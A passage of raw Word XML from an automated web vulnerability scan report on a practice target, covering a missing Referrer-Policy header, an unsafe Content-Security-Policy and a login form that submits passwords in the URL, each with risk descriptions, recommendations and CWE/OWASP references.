          </w:tcPr>
          <w:p w14:paraId="57E3DA5E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId130">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B3D2535" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Response headers do not include the Referrer-Policy HTTP security header as well as the &lt;meta&gt; tag with name 'referrer' is not present in the response.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId131">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D82CED0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E450643" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We noticed that the target application's server responses lack the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>Referrer-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP header, which controls how much referrer information the browser will send with each request originated from the current web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E0631" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A105513" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The risk is that if a user visits a web page (e.g. "http://example.com/pricing/") and clicks on a link from that page going to e.g. "https://www.google.com", the browser will send to Google the full originating URL in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header, assuming the Referrer-Policy header is not set. The originating URL could be considered sensitive information and it could be used for user tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C9A7D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF660E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">The Referrer-Policy header should be configured on the server side to avoid user tracking and inadvertent information leakage. The value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
        </w:rPr>
        <w:t>no-referrer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of this header instructs the browser to omit the Referer header entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B0D36" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16C090" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId132">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/Security/Referer_header:_privacy_and_security_concerns</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69E61606"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73E2B91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3AE7C97C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="692963B3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="46F96831" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BE2C8B8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="263B2B50" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId133">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-693</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4300AC01" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="691EE841" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C0F840" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId134">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2328DF8A" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BD38CC4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DCBEBFB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId135">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7214856D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F8DB4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBE378" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60524B75" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.19 Unsafe security header: Content-Security-Policy </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="377A6E86" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5025B1AD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="511E2272" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="0C1C5F23" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06258BCC" wp14:editId="6970BEE3">
                  <wp:extent cx="1397000" cy="139700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54FAEB83" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EEED5FB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="5B93ED13" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3929D2DD"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0A32CB46"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148B2CB3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3E7C49" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5658ED63" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59ACEC3C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId136">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/csp/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59EF8F4A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Response headers include the HTTP Content-Security-Policy security header with the following security issues:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId137">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C97D133" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57414A06" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the Content-Security-Policy (CSP) header configured for the web application includes unsafe directives. The CSP header activates a protection mechanism implemented in web browsers which prevents exploitation of Cross-Site Scripting vulnerabilities (XSS) by restricting the sources from which content can be loaded or executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC1A05E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65322E55" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>For example, if the unsafe-inline directive is present in the CSP header, the execution of inline scripts and event handlers is allowed. This can be exploited by an attacker to execute arbitrary JavaScript code in the context of the vulnerable application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51285A34" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419693D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Remove the unsafe values from the directives, adopt nonces or hashes for safer inclusion of inline scripts if they are needed, and explicitly define the sources from which scripts, styles, images or other resources can be loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE715AA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536DFB2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId138">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75306755" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId139">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CF92682"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0E67D7C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5D472204" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF0D6A9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="26EE3F0E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40CCD018" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C57FF6A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId140">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-693</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="083298F3" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF5C2BF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B3CD7E1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId141">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="63E0255D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18225D53" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7962F1B8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId142">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A5 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="290654DA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F1F088" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A57A3B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F07C4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.20 Password Submitted in URL </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="39999EFD" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53E9DE57" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E039E46" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="7BDBC821" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="255809FF" wp14:editId="3D8434F5">
                  <wp:extent cx="1397000" cy="1397000"/>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1A60FD6D" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55751345" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="07712339" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15E70F86"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2A9EEDA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C4B41BF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E2633D2"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43">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/brute/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4ECA18C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E10353A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ED6BAD3"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3C1BB6C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A265CBF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC0D0EB"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Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cookies:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>PHPSESSID=589f7516a2374b37367b6b2f248c71f5</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>security=low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="244C35F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E40411F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520EFEA7"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following form sends inputs of type password plainly in the URL:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId144">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1ABE4043"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7CAB5AD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FB3F86D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="064E15EA"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45">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/brute/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4DAE9A3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4C8EA15" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC90AC2"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5EEE1B6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E5F9689" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741EDC16"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Query:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Login=Login</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>password=Secure123456$</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>username=1d3d2d231d2dd4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cookies:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>PHPSESSID=589f7516a2374b37367b6b2f248c71f5</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>security=low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="71BF809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F9ED992" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C0D9FFD"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following form sends inputs of type password plainly in the URL:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId146">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AB59006"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563953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2632E98" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FF2CB9"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47">
              <w:r>
